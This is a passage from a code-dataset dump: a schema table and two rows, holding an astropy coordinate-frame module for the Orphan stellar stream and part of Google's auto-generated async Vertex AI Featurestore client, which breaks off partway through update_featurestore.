Dataset schema (column name, dtype, and observed range or number of distinct values):

| column | dtype | range / values |
|---|---|---|
| blob_id | string | length 40 to 40 |
| directory_id | string | length 40 to 40 |
| path | string | length 4 to 721 |
| content_id | string | length 40 to 40 |
| detected_licenses | list | length 0 to 57 |
| license_type | string | 2 classes |
| repo_name | string | length 5 to 91 |
| snapshot_id | string | length 40 to 40 |
| revision_id | string | length 40 to 40 |
| branch_name | string | 321 classes |
| visit_date | timestamp[ns] | 2016-08-12 09:31:09 to 2023-09-06 10:45:07 |
| revision_date | timestamp[ns] | 2010-09-28 14:01:40 to 2023-09-06 06:22:19 |
| committer_date | timestamp[ns] | 2010-09-28 14:01:40 to 2023-09-06 06:22:19 |
| github_id | int64 | 426 to 681M |
| star_events_count | int64 | 101 to 243k |
| fork_events_count | int64 | 0 to 110k |
| gha_license_id | string | 23 classes |
| gha_event_created_at | timestamp[ns] | 2012-06-28 18:51:49 to 2023-09-14 21:59:16 (nullable) |
| gha_created_at | timestamp[ns] | 2008-02-11 22:55:26 to 2023-08-10 11:14:58 (nullable) |
| gha_language | string | 147 classes |
| src_encoding | string | 26 classes |
| language | string | 2 classes |
| is_vendor | bool | 2 classes |
| is_generated | bool | 2 classes |
| length_bytes | int64 | 6 to 10.2M |
| extension | string | 115 classes |
| filename | string | length 3 to 113 |
| content | string | length 6 to 10.2M |
**Row 1**

- blob_id: 79fed6cce67c505d0e54df01110e60a8ed3b5f41
- directory_id: 8c0b804f1cc8cbf2f8788727df22a2cc149f7b5c
- path: /gala/coordinates/orphan.py
- content_id: 6ebd08448b02b8f03869ef2572b9fa913b98355e
- detected_licenses: ["MIT"]
- license_type: permissive
- repo_name: adrn/gala
- snapshot_id: 579cc5a4ecb22df118e1c8a2322a46e935825054
- revision_id: f62e1a6ae7a8466a4db5c8407471b524cf085637
- branch_name: refs/heads/main
- visit_date: 2023-09-04T11:42:07.278388
- revision_date: 2023-08-18T18:04:35
- committer_date: 2023-08-18T18:04:35
- github_id: 17,577,779
- star_events_count: 115
- fork_events_count: 89
- gha_license_id: MIT
- gha_event_created_at: 2023-09-05T11:40:10
- gha_created_at: 2014-03-10T00:56:18
- gha_language: Python
- src_encoding: UTF-8
- language: Python
- is_vendor: false
- is_generated: false
- length_bytes: 6,642
- extension: py
- filename: orphan.py
- content:

```python
""" Astropy coordinate class for the Orphan stream coordinate systems """
import astropy.coordinates as coord
import astropy.units as u
from astropy.coordinates import frame_transform_graph
from astropy.coordinates.matrix_utilities import rotation_matrix
import numpy as np
__all__ = ["OrphanNewberg10", "OrphanKoposov19"]
class OrphanNewberg10(coord.BaseCoordinateFrame):
"""
A Heliocentric spherical coordinate system defined by the orbit
of the Orphan stream, as described in
Newberg et al. 2010 (see: `<http://arxiv.org/abs/1001.0576>`_).
Note: to be consistent with other stream classes, we refer to the longitude
and latitude as ``phi1`` and ``phi2`` instead of ``Lambda`` and ``Beta``.
For more information about this class, see the Astropy documentation
on coordinate frames in :mod:`~astropy.coordinates`.
Parameters
----------
representation : :class:`~astropy.coordinates.BaseRepresentation` or None
A representation object or None to have no data (or use the other keywords)
phi1 : angle_like, optional, must be keyword
The longitude-like angle corresponding to Orphan's orbit.
phi2 : angle_like, optional, must be keyword
The latitude-like angle corresponding to Orphan's orbit.
distance : :class:`~astropy.units.Quantity`, optional, must be keyword
The Distance for this object along the line-of-sight.
pm_phi1_cosphi2 : :class:`~astropy.units.Quantity`, optional, must be keyword
The proper motion in the longitude-like direction corresponding to
the Orphan stream's orbit.
pm_phi2 : :class:`~astropy.units.Quantity`, optional, must be keyword
The proper motion in the latitude-like direction perpendicular to the
Orphan stream's orbit.
radial_velocity : :class:`~astropy.units.Quantity`, optional, must be keyword
The radial velocity of this object along the line-of-sight.
"""
default_representation = coord.SphericalRepresentation
default_differential = coord.SphericalCosLatDifferential
frame_specific_representation_info = {
coord.SphericalRepresentation: [
coord.RepresentationMapping("lon", "phi1"),
coord.RepresentationMapping("lat", "phi2"),
coord.RepresentationMapping("distance", "distance"),
]
}
_default_wrap_angle = 180 * u.deg
def __init__(self, *args, **kwargs):
wrap = kwargs.pop("wrap_longitude", True)
super().__init__(*args, **kwargs)
if wrap and isinstance(
self._data,
(coord.UnitSphericalRepresentation, coord.SphericalRepresentation),
):
self._data.lon.wrap_angle = self._default_wrap_angle
# TODO: remove this. This is a hack required as of astropy v3.1 in order
# to have the longitude components wrap at the desired angle
def represent_as(self, base, s="base", in_frame_units=False):
r = super().represent_as(base, s=s, in_frame_units=in_frame_units)
if hasattr(r, "lon"):
r.lon.wrap_angle = self._default_wrap_angle
return r
represent_as.__doc__ = coord.BaseCoordinateFrame.represent_as.__doc__
# Define the Euler angles
phi = 128.79 * u.degree
theta = 54.39 * u.degree
psi = 90.70 * u.degree
# Generate the rotation matrix using the x-convention (see Goldstein)
D = rotation_matrix(phi, "z")
C = rotation_matrix(theta, "x")
B = rotation_matrix(psi, "z")
R = B @ C @ D
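# R is a product of orthogonal rotation matrices, so it is itself orthogonal
# and its inverse equals its transpose; orp_to_galactic() below relies on
# this by returning galactic_to_orp().T.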
@frame_transform_graph.transform(
coord.StaticMatrixTransform, coord.Galactic, OrphanNewberg10
)
def galactic_to_orp():
"""Compute the transformation from Galactic spherical to
heliocentric Orphan coordinates.
"""
return R
# Orphan to Galactic coordinates
@frame_transform_graph.transform(
coord.StaticMatrixTransform, OrphanNewberg10, coord.Galactic
)
def orp_to_galactic():
"""Compute the transformation from heliocentric Orphan coordinates to
spherical Galactic.
"""
return galactic_to_orp().T
# ------------------------------------------------------------------------------
class OrphanKoposov19(coord.BaseCoordinateFrame):
"""A coordinate frame for the Orphan stream defined by Sergey Koposov.
Parameters
----------
phi1 : `~astropy.units.Quantity`
Longitude component.
phi2 : `~astropy.units.Quantity`
Latitude component.
distance : `~astropy.units.Quantity`
Distance.
pm_phi1_cosphi2 : `~astropy.units.Quantity`
Proper motion in longitude.
pm_phi2 : `~astropy.units.Quantity`
Proper motion in latitude.
radial_velocity : `~astropy.units.Quantity`
Line-of-sight or radial velocity.
"""
default_representation = coord.SphericalRepresentation
default_differential = coord.SphericalCosLatDifferential
frame_specific_representation_info = {
coord.SphericalRepresentation: [
coord.RepresentationMapping("lon", "phi1"),
coord.RepresentationMapping("lat", "phi2"),
coord.RepresentationMapping("distance", "distance"),
]
}
_default_wrap_angle = 180 * u.deg
def __init__(self, *args, **kwargs):
wrap = kwargs.pop("wrap_longitude", True)
super().__init__(*args, **kwargs)
if wrap and isinstance(
self._data,
(coord.UnitSphericalRepresentation, coord.SphericalRepresentation),
):
self._data.lon.wrap_angle = self._default_wrap_angle
# TODO: remove this. This is a hack required as of astropy v3.1 in order
# to have the longitude components wrap at the desired angle
def represent_as(self, base, s="base", in_frame_units=False):
r = super().represent_as(base, s=s, in_frame_units=in_frame_units)
if hasattr(r, "lon"):
r.lon.wrap_angle = self._default_wrap_angle
return r
represent_as.__doc__ = coord.BaseCoordinateFrame.represent_as.__doc__
@frame_transform_graph.transform(
coord.StaticMatrixTransform, coord.ICRS, OrphanKoposov19
)
def icrs_to_orp19():
"""Compute the transformation from ICRS to
heliocentric Orphan coordinates.
"""
R = np.array(
[
[-0.44761231, -0.08785756, -0.88990128],
[-0.84246097, 0.37511331, 0.38671632],
[0.29983786, 0.92280606, -0.2419219],
]
)
return R
# Orphan to ICRS coordinates
@frame_transform_graph.transform(
coord.StaticMatrixTransform, OrphanKoposov19, coord.ICRS
)
def orp19_to_icrs():
"""Compute the transformation from heliocentric Orphan coordinates to
spherical ICRS.
"""
return icrs_to_orp19().T
```
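To make the frames above concrete, here is a minimal usage sketch, assuming `gala` is installed and that `gala.coordinates` re-exports these classes (as the upstream package does); the sky position is arbitrary:

```python
import astropy.coordinates as coord
import astropy.units as u

# Importing the frame registers its transforms with astropy's graph.
from gala.coordinates import OrphanKoposov19

# An arbitrary ICRS position (made-up values).
c = coord.SkyCoord(ra=160.0 * u.deg, dec=-1.0 * u.deg, frame="icrs")

# Transform into the Orphan stream frame defined by the rotation matrix
# above; phi1/phi2 are the stream longitude and latitude.
orp = c.transform_to(OrphanKoposov19())
print(orp.phi1.degree, orp.phi2.degree)
```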
**Row 2**

- blob_id: d3e70ff11823f81108484cd15da679366ad62561
- directory_id: 99dcb18a9e3ea367272f740b8cbf3c34285a0c08
- path: /google/cloud/aiplatform_v1beta1/services/featurestore_service/async_client.py
- content_id: aa6784e4904ecc37f4ee403d535b71c5411a4389
- detected_licenses: ["Apache-2.0"]
- license_type: permissive
- repo_name: googleapis/python-aiplatform
- snapshot_id: 926a4873f35dbea15b2fd86c0e16b5e6556d803e
- revision_id: 76b95b92c1d3b87c72d754d8c02b1bca652b9a27
- branch_name: refs/heads/main
- visit_date: 2023-08-19T23:49:02.180075
- revision_date: 2023-08-19T13:25:59
- committer_date: 2023-08-19T13:27:27
- github_id: 298,017,988
- star_events_count: 418
- fork_events_count: 240
- gha_license_id: Apache-2.0
- gha_event_created_at: 2023-09-14T21:08:33
- gha_created_at: 2020-09-23T15:43:39
- gha_language: Python
- src_encoding: UTF-8
- language: Python
- is_vendor: false
- is_generated: false
- length_bytes: 158,903
- extension: py
- filename: async_client.py
- content:

```python
# -*- coding: utf-8 -*-
# Copyright 2023 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from collections import OrderedDict
import functools
import re
from typing import (
Dict,
Mapping,
MutableMapping,
MutableSequence,
Optional,
Sequence,
Tuple,
Type,
Union,
)
from google.cloud.aiplatform_v1beta1 import gapic_version as package_version
from google.api_core.client_options import ClientOptions
from google.api_core import exceptions as core_exceptions
from google.api_core import gapic_v1
from google.api_core import retry as retries
from google.auth import credentials as ga_credentials # type: ignore
from google.oauth2 import service_account # type: ignore
try:
OptionalRetry = Union[retries.Retry, gapic_v1.method._MethodDefault]
except AttributeError: # pragma: NO COVER
OptionalRetry = Union[retries.Retry, object] # type: ignore
from google.api_core import operation as gac_operation # type: ignore
from google.api_core import operation_async # type: ignore
from google.cloud.aiplatform_v1beta1.services.featurestore_service import pagers
from google.cloud.aiplatform_v1beta1.types import encryption_spec
from google.cloud.aiplatform_v1beta1.types import entity_type
from google.cloud.aiplatform_v1beta1.types import entity_type as gca_entity_type
from google.cloud.aiplatform_v1beta1.types import feature
from google.cloud.aiplatform_v1beta1.types import feature as gca_feature
from google.cloud.aiplatform_v1beta1.types import feature_monitoring_stats
from google.cloud.aiplatform_v1beta1.types import featurestore
from google.cloud.aiplatform_v1beta1.types import featurestore as gca_featurestore
from google.cloud.aiplatform_v1beta1.types import featurestore_monitoring
from google.cloud.aiplatform_v1beta1.types import featurestore_service
from google.cloud.aiplatform_v1beta1.types import operation as gca_operation
from google.cloud.location import locations_pb2 # type: ignore
from google.iam.v1 import iam_policy_pb2 # type: ignore
from google.iam.v1 import policy_pb2 # type: ignore
from google.longrunning import operations_pb2
from google.protobuf import empty_pb2 # type: ignore
from google.protobuf import field_mask_pb2 # type: ignore
from google.protobuf import timestamp_pb2 # type: ignore
from .transports.base import FeaturestoreServiceTransport, DEFAULT_CLIENT_INFO
from .transports.grpc_asyncio import FeaturestoreServiceGrpcAsyncIOTransport
from .client import FeaturestoreServiceClient
class FeaturestoreServiceAsyncClient:
"""The service that handles CRUD and List for resources for
Featurestore.
"""
_client: FeaturestoreServiceClient
DEFAULT_ENDPOINT = FeaturestoreServiceClient.DEFAULT_ENDPOINT
DEFAULT_MTLS_ENDPOINT = FeaturestoreServiceClient.DEFAULT_MTLS_ENDPOINT
entity_type_path = staticmethod(FeaturestoreServiceClient.entity_type_path)
parse_entity_type_path = staticmethod(
FeaturestoreServiceClient.parse_entity_type_path
)
feature_path = staticmethod(FeaturestoreServiceClient.feature_path)
parse_feature_path = staticmethod(FeaturestoreServiceClient.parse_feature_path)
featurestore_path = staticmethod(FeaturestoreServiceClient.featurestore_path)
parse_featurestore_path = staticmethod(
FeaturestoreServiceClient.parse_featurestore_path
)
common_billing_account_path = staticmethod(
FeaturestoreServiceClient.common_billing_account_path
)
parse_common_billing_account_path = staticmethod(
FeaturestoreServiceClient.parse_common_billing_account_path
)
common_folder_path = staticmethod(FeaturestoreServiceClient.common_folder_path)
parse_common_folder_path = staticmethod(
FeaturestoreServiceClient.parse_common_folder_path
)
common_organization_path = staticmethod(
FeaturestoreServiceClient.common_organization_path
)
parse_common_organization_path = staticmethod(
FeaturestoreServiceClient.parse_common_organization_path
)
common_project_path = staticmethod(FeaturestoreServiceClient.common_project_path)
parse_common_project_path = staticmethod(
FeaturestoreServiceClient.parse_common_project_path
)
common_location_path = staticmethod(FeaturestoreServiceClient.common_location_path)
parse_common_location_path = staticmethod(
FeaturestoreServiceClient.parse_common_location_path
)
@classmethod
def from_service_account_info(cls, info: dict, *args, **kwargs):
"""Creates an instance of this client using the provided credentials
info.
Args:
info (dict): The service account private key info.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
FeaturestoreServiceAsyncClient: The constructed client.
"""
return FeaturestoreServiceClient.from_service_account_info.__func__(FeaturestoreServiceAsyncClient, info, *args, **kwargs) # type: ignore
@classmethod
def from_service_account_file(cls, filename: str, *args, **kwargs):
"""Creates an instance of this client using the provided credentials
file.
Args:
filename (str): The path to the service account private key json
file.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
FeaturestoreServiceAsyncClient: The constructed client.
"""
return FeaturestoreServiceClient.from_service_account_file.__func__(FeaturestoreServiceAsyncClient, filename, *args, **kwargs) # type: ignore
from_service_account_json = from_service_account_file
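    # Usage sketch (illustrative, not part of the generated source; the key
    # path is hypothetical):
    #
    #     client = FeaturestoreServiceAsyncClient.from_service_account_file(
    #         "path/to/service-account.json"
    #     )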
@classmethod
def get_mtls_endpoint_and_cert_source(
cls, client_options: Optional[ClientOptions] = None
):
"""Return the API endpoint and client cert source for mutual TLS.
The client cert source is determined in the following order:
(1) if `GOOGLE_API_USE_CLIENT_CERTIFICATE` environment variable is not "true", the
client cert source is None.
(2) if `client_options.client_cert_source` is provided, use the provided one; if the
default client cert source exists, use the default one; otherwise the client cert
source is None.
The API endpoint is determined in the following order:
(1) if `client_options.api_endpoint` is provided, use the provided one.
(2) if `GOOGLE_API_USE_CLIENT_CERTIFICATE` environment variable is "always", use the
default mTLS endpoint; if the environment variable is "never", use the default API
endpoint; otherwise if client cert source exists, use the default mTLS endpoint, otherwise
use the default API endpoint.
More details can be found at https://google.aip.dev/auth/4114.
Args:
client_options (google.api_core.client_options.ClientOptions): Custom options for the
client. Only the `api_endpoint` and `client_cert_source` properties may be used
in this method.
Returns:
Tuple[str, Callable[[], Tuple[bytes, bytes]]]: returns the API endpoint and the
client cert source to use.
Raises:
google.auth.exceptions.MutualTLSChannelError: If any errors happen.
"""
return FeaturestoreServiceClient.get_mtls_endpoint_and_cert_source(client_options) # type: ignore
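    # Usage sketch (illustrative): resolve which endpoint and client cert
    # source would be used under the current environment variables.
    #
    #     api_endpoint, cert_source = (
    #         FeaturestoreServiceAsyncClient.get_mtls_endpoint_and_cert_source()
    #     )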
@property
def transport(self) -> FeaturestoreServiceTransport:
"""Returns the transport used by the client instance.
Returns:
FeaturestoreServiceTransport: The transport used by the client instance.
"""
return self._client.transport
get_transport_class = functools.partial(
type(FeaturestoreServiceClient).get_transport_class,
type(FeaturestoreServiceClient),
)
def __init__(
self,
*,
credentials: Optional[ga_credentials.Credentials] = None,
transport: Union[str, FeaturestoreServiceTransport] = "grpc_asyncio",
client_options: Optional[ClientOptions] = None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
) -> None:
"""Instantiates the featurestore service client.
Args:
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
transport (Union[str, ~.FeaturestoreServiceTransport]): The
transport to use. If set to None, a transport is chosen
automatically.
client_options (ClientOptions): Custom options for the client. It
won't take effect if a ``transport`` instance is provided.
(1) The ``api_endpoint`` property can be used to override the
default endpoint provided by the client. GOOGLE_API_USE_MTLS_ENDPOINT
environment variable can also be used to override the endpoint:
"always" (always use the default mTLS endpoint), "never" (always
use the default regular endpoint) and "auto" (auto switch to the
default mTLS endpoint if client certificate is present, this is
the default value). However, the ``api_endpoint`` property takes
precedence if provided.
(2) If GOOGLE_API_USE_CLIENT_CERTIFICATE environment variable
is "true", then the ``client_cert_source`` property can be used
to provide client certificate for mutual TLS transport. If
not provided, the default SSL client certificate will be used if
present. If GOOGLE_API_USE_CLIENT_CERTIFICATE is "false" or not
set, no client certificate will be used.
Raises:
google.auth.exceptions.MutualTlsChannelError: If mutual TLS transport
creation failed for any reason.
"""
self._client = FeaturestoreServiceClient(
credentials=credentials,
transport=transport,
client_options=client_options,
client_info=client_info,
)
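    # Usage sketch (illustrative): point the client at a regional endpoint
    # via ClientOptions; the endpoint shown is an example value.
    #
    #     client = FeaturestoreServiceAsyncClient(
    #         client_options=ClientOptions(
    #             api_endpoint="us-central1-aiplatform.googleapis.com"
    #         )
    #     )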
async def create_featurestore(
self,
request: Optional[
Union[featurestore_service.CreateFeaturestoreRequest, dict]
] = None,
*,
parent: Optional[str] = None,
featurestore: Optional[gca_featurestore.Featurestore] = None,
featurestore_id: Optional[str] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> operation_async.AsyncOperation:
r"""Creates a new Featurestore in a given project and
location.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import aiplatform_v1beta1
async def sample_create_featurestore():
# Create a client
client = aiplatform_v1beta1.FeaturestoreServiceAsyncClient()
# Initialize request argument(s)
request = aiplatform_v1beta1.CreateFeaturestoreRequest(
parent="parent_value",
featurestore_id="featurestore_id_value",
)
# Make the request
operation = client.create_featurestore(request=request)
print("Waiting for operation to complete...")
response = (await operation).result()
# Handle the response
print(response)
Args:
request (Optional[Union[google.cloud.aiplatform_v1beta1.types.CreateFeaturestoreRequest, dict]]):
The request object. Request message for
[FeaturestoreService.CreateFeaturestore][google.cloud.aiplatform.v1beta1.FeaturestoreService.CreateFeaturestore].
parent (:class:`str`):
Required. The resource name of the Location to create
Featurestores. Format:
``projects/{project}/locations/{location}``
This corresponds to the ``parent`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
featurestore (:class:`google.cloud.aiplatform_v1beta1.types.Featurestore`):
Required. The Featurestore to create.
This corresponds to the ``featurestore`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
featurestore_id (:class:`str`):
Required. The ID to use for this Featurestore, which
will become the final component of the Featurestore's
resource name.
This value may be up to 60 characters, and valid
characters are ``[a-z0-9_]``. The first character cannot
be a number.
The value must be unique within the project and
location.
This corresponds to the ``featurestore_id`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.api_core.operation_async.AsyncOperation:
An object representing a long-running operation.
The result type for the operation will be :class:`google.cloud.aiplatform_v1beta1.types.Featurestore` Vertex AI Feature Store provides a centralized repository for organizing,
storing, and serving ML features. The Featurestore is
a top-level container for your features and their
values.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([parent, featurestore, featurestore_id])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
request = featurestore_service.CreateFeaturestoreRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if parent is not None:
request.parent = parent
if featurestore is not None:
request.featurestore = featurestore
if featurestore_id is not None:
request.featurestore_id = featurestore_id
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.create_featurestore,
default_timeout=5.0,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = await rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Wrap the response in an operation future.
response = operation_async.from_gapic(
response,
self._client._transport.operations_client,
gca_featurestore.Featurestore,
metadata_type=featurestore_service.CreateFeaturestoreOperationMetadata,
)
# Done; return the response.
return response
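    # Note: the long-running-operation pattern above (build the request,
    # wrap the RPC with retry/timeout, send it, then wrap the response with
    # operation_async.from_gapic) is shared by all mutating methods below.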
async def get_featurestore(
self,
request: Optional[
Union[featurestore_service.GetFeaturestoreRequest, dict]
] = None,
*,
name: Optional[str] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> featurestore.Featurestore:
r"""Gets details of a single Featurestore.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import aiplatform_v1beta1
async def sample_get_featurestore():
# Create a client
client = aiplatform_v1beta1.FeaturestoreServiceAsyncClient()
# Initialize request argument(s)
request = aiplatform_v1beta1.GetFeaturestoreRequest(
name="name_value",
)
# Make the request
response = await client.get_featurestore(request=request)
# Handle the response
print(response)
Args:
request (Optional[Union[google.cloud.aiplatform_v1beta1.types.GetFeaturestoreRequest, dict]]):
The request object. Request message for
[FeaturestoreService.GetFeaturestore][google.cloud.aiplatform.v1beta1.FeaturestoreService.GetFeaturestore].
name (:class:`str`):
Required. The name of the
Featurestore resource.
This corresponds to the ``name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.aiplatform_v1beta1.types.Featurestore:
Vertex AI Feature Store provides a
centralized repository for organizing,
storing, and serving ML features. The
Featurestore is a top-level container
for your features and their values.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([name])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
request = featurestore_service.GetFeaturestoreRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if name is not None:
request.name = name
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.get_featurestore,
default_timeout=5.0,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
response = await rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
async def list_featurestores(
self,
request: Optional[
Union[featurestore_service.ListFeaturestoresRequest, dict]
] = None,
*,
parent: Optional[str] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> pagers.ListFeaturestoresAsyncPager:
r"""Lists Featurestores in a given project and location.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import aiplatform_v1beta1
async def sample_list_featurestores():
# Create a client
client = aiplatform_v1beta1.FeaturestoreServiceAsyncClient()
# Initialize request argument(s)
request = aiplatform_v1beta1.ListFeaturestoresRequest(
parent="parent_value",
)
# Make the request
page_result = client.list_featurestores(request=request)
# Handle the response
async for response in page_result:
print(response)
Args:
request (Optional[Union[google.cloud.aiplatform_v1beta1.types.ListFeaturestoresRequest, dict]]):
The request object. Request message for
[FeaturestoreService.ListFeaturestores][google.cloud.aiplatform.v1beta1.FeaturestoreService.ListFeaturestores].
parent (:class:`str`):
Required. The resource name of the Location to list
Featurestores. Format:
``projects/{project}/locations/{location}``
This corresponds to the ``parent`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.aiplatform_v1beta1.services.featurestore_service.pagers.ListFeaturestoresAsyncPager:
Response message for
[FeaturestoreService.ListFeaturestores][google.cloud.aiplatform.v1beta1.FeaturestoreService.ListFeaturestores].
Iterating over this object will yield results and
resolve additional pages automatically.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([parent])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
request = featurestore_service.ListFeaturestoresRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if parent is not None:
request.parent = parent
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.list_featurestores,
default_timeout=5.0,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = await rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# This method is paged; wrap the response in a pager, which provides
# an `__aiter__` convenience method.
response = pagers.ListFeaturestoresAsyncPager(
method=rpc,
request=request,
response=response,
metadata=metadata,
)
# Done; return the response.
return response
async def update_featurestore(
self,
request: Optional[
Union[featurestore_service.UpdateFeaturestoreRequest, dict]
] = None,
*,
featurestore: Optional[gca_featurestore.Featurestore] = None,
update_mask: Optional[field_mask_pb2.FieldMask] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> operation_async.AsyncOperation:
r"""Updates the parameters of a single Featurestore.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import aiplatform_v1beta1
async def sample_update_featurestore():
# Create a client
client = aiplatform_v1beta1.FeaturestoreServiceAsyncClient()
# Initialize request argument(s)
request = aiplatform_v1beta1.UpdateFeaturestoreRequest(
)
# Make the request
operation = client.update_featurestore(request=request)
print("Waiting for operation to complete...")
response = (await operation).result()
# Handle the response
print(response)
Args:
request (Optional[Union[google.cloud.aiplatform_v1beta1.types.UpdateFeaturestoreRequest, dict]]):
The request object. Request message for
[FeaturestoreService.UpdateFeaturestore][google.cloud.aiplatform.v1beta1.FeaturestoreService.UpdateFeaturestore].
featurestore (:class:`google.cloud.aiplatform_v1beta1.types.Featurestore`):
Required. The Featurestore's ``name`` field is used to
identify the Featurestore to be updated. Format:
``projects/{project}/locations/{location}/featurestores/{featurestore}``
This corresponds to the ``featurestore`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
update_mask (:class:`google.protobuf.field_mask_pb2.FieldMask`):
Field mask is used to specify the fields to be
overwritten in the Featurestore resource by the update.
The fields specified in the update_mask are relative to
the resource, not the full request. A field will be
overwritten if it is in the mask. If the user does not
provide a mask then only the non-empty fields present in
the request will be overwritten. Set the update_mask to
``*`` to override all fields.
Updatable fields:
- ``labels``
- ``online_serving_config.fixed_node_count``
- ``online_serving_config.scaling``
- ``online_storage_ttl_days``
This corresponds to the ``update_mask`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.api_core.operation_async.AsyncOperation:
An object representing a long-running operation.
The result type for the operation will be :class:`google.cloud.aiplatform_v1beta1.types.Featurestore` Vertex AI Feature Store provides a centralized repository for organizing,
storing, and serving ML features. The Featurestore is
a top-level container for your features and their
values.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([featurestore, update_mask])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
request = featurestore_service.UpdateFeaturestoreRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if featurestore is not None:
request.featurestore = featurestore
if update_mask is not None:
request.update_mask = update_mask
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.update_featurestore,
default_timeout=5.0,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
